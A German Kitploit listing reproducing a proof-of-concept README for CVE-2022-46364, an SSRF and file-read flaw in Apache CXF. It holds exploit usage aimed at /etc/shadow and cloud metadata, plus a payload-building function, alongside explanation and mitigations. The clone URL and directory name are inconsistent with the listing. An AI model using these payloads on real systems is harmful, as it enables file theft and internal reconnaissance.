Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-46364-Proof-of-the-concept — Diese Schwachstelle ermöglicht es einem Angreifer, SSRF-Angriffe (Server-Side Request Forgery) auf Apache-CXF-Webdienste durchzuführen, die MTOM/XOP-Anfragen akzeptieren. Das Problem besteht darin, wie das href-Attribut von xop:Include geparst wird, wodurch der Server beliebige URLs anfordern kann. | Kitploit
Tools/GitHubGitHub/cybermaksx/cve-2022-46364-proof-of-the-concept
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubcybermaksx/cve-2022-46364-proof-of-the-concept

CVE-2022-46364-Proof-of-the-concept

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Diese Schwachstelle ermöglicht es einem Angreifer, SSRF-Angriffe (Server-Side Request Forgery) auf Apache-CXF-Webdienste durchzuführen, die MTOM/XOP-Anfragen akzeptieren. Das Problem besteht darin, wie das href-Attribut von xop:Include geparst wird, wodurch der Server beliebige URLs anfordern kann.

Teilen

CVE-2022-46364: Apache CXF MTOM XOP:Include SSRF zu LFI Exploit

⚠️ HAFTUNGSAUSSCHLUSS

DIESES WERKZEUG IST NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS GEEIGNET

Dieser Proof-of-Concept-Exploit wird zu Bildungszwecken bereitgestellt, um Sicherheitsexperten zu helfen, die Schwachstelle zu verstehen und ihre Systeme zu schützen. Unautorisierter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keinerlei Haftung für Missbrauch oder Schäden, die durch dieses Werkzeug verursacht werden. Sie müssen vor dem Testen eine ausdrückliche schriftliche Genehmigung des Systembesitzers einholen. Durch die Nutzung dieses Werkzeugs stimmen Sie der Einhaltung aller geltenden Gesetze zu.


📋 INHALTSVERZEICHNIS

  1. Übersicht
  2. Schwachstellendetails
  3. Technische Tiefenanalyse
  4. Nutzung des Exploits
  5. Installation & Voraussetzungen
  6. Abhilfemaßnahmen
  7. Referenzen & Danksagungen

📌 ÜBERSICHT

AttributWert
CVE-IDCVE-2022-46364
GHSA-IDGHSA-x3x3-qwjq-8gj4
SchwachstellentypServer-Side Request Forgery (SSRF) → Local File Inclusion (LFI)
Betroffene SoftwareApache CXF < 3.5.5, Apache CXF < 3.4.10
SchweregradKritisch
CVSS-Score9.8 (Kritisch)
AngriffsvektorNetzwerk
AuthentifizierungKeine erforderlich
Patch-VersionenApache CXF 3.5.5+, 3.4.10+

Dieser Exploit nutzt eine kritische SSRF-Schwachstelle in der MTOM-Implementierung (Message Transmission Optimization Mechanism) von Apache CXF aus, um Local File Inclusion (LFI) und interne Netzwerkscans zu ermöglichen.


🔬 SCHWACHSTELLENDETAILS

Das Kernproblem

Apache CXF validiert das href-Attribut in xop:Include-Elementen bei der Verarbeitung MTOM-kodierter SOAP-Nachrichten nicht korrekt. Die Bibliothek verwendet URLConnection von Java, um die URI ohne geeignete Protokollbeschränkungen aufzulösen, sodass Angreifer Folgendes angeben können:

  • file:// - Lokale Dateien lesen (LFI)
  • http:// / https:// - Interne Netzwerkanfragen (SSRF)
  • ftp:// - FTP-Anfragen (mögliche weitere Ausnutzung)

Warum dies wichtig ist

Diese Schwachstelle ist besonders gefährlich, weil:

  1. Keine Authentifizierung erforderlich – Angreifer können jeden erreichbaren SOAP-Endpunkt angreifen
  2. Keine speziellen Berechtigungen erforderlich – Der Server führt Anfragen mit seinen eigenen Berechtigungen aus
  3. Informationsoffenlegung – Kann Cloud-Metadaten (AWS, GCP, Azure), Konfigurationsdateien und Quellcode preisgeben
  4. Netzwerkpivotierung – Der verwundbare Server wird zu einem Proxy für die interne Netzwerkaufklärung

Betroffene Konfigurationen

Jede Apache-CXF-Bereitstellung, die:

  • MTOM-kodierte SOAP-Nachrichten akzeptiert
  • Mindestens eine Web-Service-Methode mit einem Parameter (beliebigen Typs) hat
  • Versionen vor 3.5.5 (Hauptzweig) oder 3.4.10 (Legacy-Zweig) verwendet

🧠 TECHNISCHE TIEFENANALYSE

Protokollhintergrund: MTOM und XOP

MTOM (Message Transmission Optimization Mechanism) ist ein W3C-Standard zur Optimierung der binären Datenübertragung in SOAP-Nachrichten. Es verwendet XOP (XML-binary Optimized Packaging), um Binärdatenreferenzen einzubinden:

root@kitploit:~
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <myData>
            <xop:Include href="cid:[email protected]" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </myData>
    </soap:Body>
</soap:Envelope>

Normalerweise enthält href eine CID (Content-ID)-Referenz auf einen MIME-Teil. Allerdings verarbeitet die AttachmentUtil-Klasse von Apache CXF href-Werte als generische URIs ohne ordnungsgemäße Bereinigung.

Der anfällige Codepfad

  1. Anfrageparsen:

    • CXF empfängt eine multipart/related-HTTP-Anfrage mit Content-Type: application/xop+xml
    • AttachmentUtil.getAttachmentObject() verarbeitet xop:Include-Elemente
  2. URI-Auflösung:

    • Die anfällige Methode ruft direkt new URL(href).openStream() auf
    • Es erfolgt keine Blockierung des file://-Protokolls
    • Es gibt keine Netzwerkbeschränkung (z. B. keine Validierung gegen interne IP-Bereiche)
  3. Antworteinbettung:

    • Der abgerufene Inhalt wird Base64-kodiert und in die SOAP-Antwort eingebettet
    • Der Angreifer erhält die Daten im SOAP-Envelope

Code-Ausschnitt (Anfälliges Muster)

root@kitploit:~
// Vereinfachte Darstellung des anfälligen Codes in CXF < 3.5.5
public DataHandler getAttachmentObject(String href) {
    URL url = new URL(href);  // Keine Protokollvalidierung!
    return new DataHandler(url.openStream());
}

Warum LFI funktioniert

Das file://-Protokoll folgt demselben Codepfad:

  • file:///etc/passwd → Java öffnet /etc/passwd als Dateistream
  • Dateiinhalte werden als Anhang zurückgegeben
  • Keine Dateisystembeschränkungen außer den Berechtigungen des CXF-Prozessbenutzers

Netzwerkscan-Fähigkeit

Durch Iteration über IPs und Ports können Angreifer:

  • Interne Dienste entdecken
  • Auf Cloud-Metadaten-Endpunkte zugreifen (169.254.169.254)
  • Netzwerksegmentierungskontrollen umgehen

🛠️ NUTZUNG DES EXPLOITS

Befehlsyntax

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-e ENDPOINT] [-u URL] [-f FILE] [-s SCAN]

CVE-2022-46364 Apache CXF SSRF zu LFI Exploit - Nur zu Bildungszwecken

options:
  -h, --help            Zeigt diese Hilfemeldung an und beendet das Programm
  -t TARGET, --target TARGET
                        Basis-URL des Ziels (z. B. http://192.168.1.100:8080)
  -e ENDPOINT, --endpoint ENDPOINT
                        Pfad des Web-Service-Endpunkts (Standard: /services/Service)
  -u URL, --url URL     Externe URL für SSRF (z. B. http://169.254.169.254/latest/meta-data/)
  -f FILE, --file FILE  Lokaler Dateipfad für LFI (z. B. /etc/passwd, C:\\Windows\\win.ini)
  -s SCAN, --scan SCAN  Internen Netzwerkbereich in CIDR-Notation scannen (z. B. 192.168.1.0/24)

Erläuterung der Argumente

ArgumentBeschreibungBeispiel
-t, --targetErforderlich. Basis-URL des Ziel-Apache-CXF-Diensteshttp://10.10.10.50:8080
-e, --endpointOptional. SOAP-Endpunktpfad/services/UserManagement
-u, --urlHTTP/HTTPS-URL, die per SSRF abgerufen werden sollhttp://169.254.169.254/latest/user-data
-f, --fileLokaler Dateipfad, der per LFI gelesen werden soll/etc/shadow, C:\ProgramData\secret.txt

📦 INSTALLATION & VORAUSSETZUNGEN

Voraussetzungen

root@kitploit:~
# Python 3.6 oder höher erforderlich
python --version

Installationsschritte

root@kitploit:~
# Repository klonen
git clone https://github.com/cybermaksxx/CVE-2022-46364-Proof-of-the-concept
cd CVE-2022-46364-PoC

### Abhängigkeiten

requests>=2.28.0 urllib3>=1.26.0

root@kitploit:~

---



### Kerndetails der Implementierung

#### 1. MTOM-Payload-Konstruktion
```python
def create_mtom_payload(uri):
    """Erstelle eine multipart/related MTOM-Nachricht mit xop:Include"""
    soap_part = f"""--MIME_BOUNDARY
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: binary

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <vulnerableParam>
            <xop:Include href="{uri}" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </vulnerableParam>
    </soap:Body>
</soap:Envelope>
--MIME_BOUNDARY--"""
    return soap_part

🛡️ ABHILFEMASSNAHMEN

Offizieller Fix

Upgrade auf eine gepatchte Version:

root@kitploit:~
<!-- Für Maven-Projekte -->
<dependency>
    <groupId>org.apache.cxf</groupId>
    <artifactId>cxf-rt-frontend-jaxws</artifactId>
    <version>3.5.5</version> <!-- oder 3.4.10 für Legacy -->
</dependency>

Workarounds (falls Patchen nicht möglich)

  1. MTOM komplett deaktivieren (falls nicht benötigt):

    root@kitploit:~
    <jaxws:endpoint ...>
        <jaxws:properties>
            <entry key="mtom-enabled" value="false"/>
        </jaxws:properties>
    </jaxws:endpoint>
    
  2. Netzwerkebenen-Kontrollen:

    • Ausgehende Verbindungen vom CXF-Anwendungsserver einschränken
    • Firewalls verwenden, um Zugriff auf interne IP-Bereiche von der Anwendungsschicht aus zu verhindern
    • Egress-Filtering implementieren
  3. Web Application Firewall (WAF)-Regeln:

    • Anfragen blockieren, die xop:Include mit href enthalten, das auf file:// oder interne IP-Adressen verweist

📚 REFERENZEN & DANKSAGUNGEN

Ursprüngliche Forscher

Diese Schwachstelle wurde entdeckt und verantwortungsvoll gemeldet von:

  • Jonathan Leitschuh – Sicherheitsforscher
  • Nick Tait – Sicherheitsforscher

Offizielle Advisories

  • Apache CXF Sicherheitshinweis
  • GitHub Advisory Database: GHSA-x3x3-qwjq-8gj4
  • NVD: CVE-2022-46364

Verwandte Ressourcen

  • MTOM-Spezifikation (W3C)
  • XOP-Spezifikation (W3C)
  • Apache CXF Dokumentation

Danksagungen

  • Apache CXF Team für die schnelle Reaktion und den Patch
  • GitHub Security Lab für die Veröffentlichung des Hinweises
  • Sicherheitscommunity für verantwortungsvolle Offenlegungspraktiken

📄 LIZENZ

Dieses Werkzeug wird ausschließlich zu Bildungszwecken bereitgestellt. Unautorisierte Nutzung ist untersagt.

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

Zuletzt aktualisiert: März 2026
Version: 1.0
Kontakt: Bei Sicherheitsbedenken oder Fragen öffnen Sie bitte ein Issue auf GitHub.


Dieses Dokument ist Teil verantwortungsvoller Sicherheitsforschung. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie testen.

Tool herunterladen